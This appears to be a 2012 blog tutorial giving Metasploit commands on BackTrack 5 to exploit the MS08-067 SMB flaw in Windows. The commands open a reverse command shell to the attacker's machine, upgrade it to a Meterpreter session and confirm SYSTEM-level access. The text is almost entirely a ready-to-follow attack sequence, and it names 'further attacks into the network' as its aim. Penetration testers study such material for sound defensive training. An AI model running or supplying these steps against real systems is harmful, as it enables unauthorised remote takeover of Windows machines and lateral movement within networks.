Tuesday 11 September 2012

Command Shell Upgrade On Backtrack 5



AIM
  • The aim of this tutorial is to upgrade a command shell session into a Meterpreter session and make the perfect launching pad for further attacks into the network.
Open Your 'msfconsole'
  • To open it, follow the path: BackTrack > Exploitation > Network Exploitation Tools > Metasploit Framework > msfconsole


Set Exploit
  • Command Used : use exploit/windows/smb/ms08_067_netapi

Set Payload
  • Command Used : set payload windows/shell_reverse_tcp

Show Options
  • Command Used : show options

Set Remote Host and Local Host
  • Command used to set the remote host : set RHOST <Remote Address>
  • Command used to set the local host : set LHOST <Local Address>

Show Options 
  • Command Used : show options 

Exploit Target
  • Command Used : exploit -z
  • After the exploit runs, the output shows that 1 session is opened.

Session
  • Command Used : sessions -l
  • This command shows the sessions opened on your BackTrack 5 machine.

Upgrading Win32 Session into Meterpreter Session
  • Metasploit has a feature to upgrade a command shell session to a Meterpreter session: look at the -u option.
  • Command Used : sessions -u 1
  • At the end, it shows that 2 sessions are opened.

See the Sessions
  • Command Used : sessions -l
  • When you enter the command, it shows all the sessions that are opened.
  • Here it shows the two sessions:
  1. shell windows
  2. meterpreter

Open Meterpreter Session
  • To open the Meterpreter session, enter the command shown below.
  • Command Used : sessions -i 2
  • After you press the Enter key, your Meterpreter session is started.
  • When you enter the getuid command, it shows the Server Username as: NT AUTHORITY\SYSTEM.

THIS IS HOW WE CAN UPGRADE THE COMMAND SHELL INTO METERPRETER SHELL
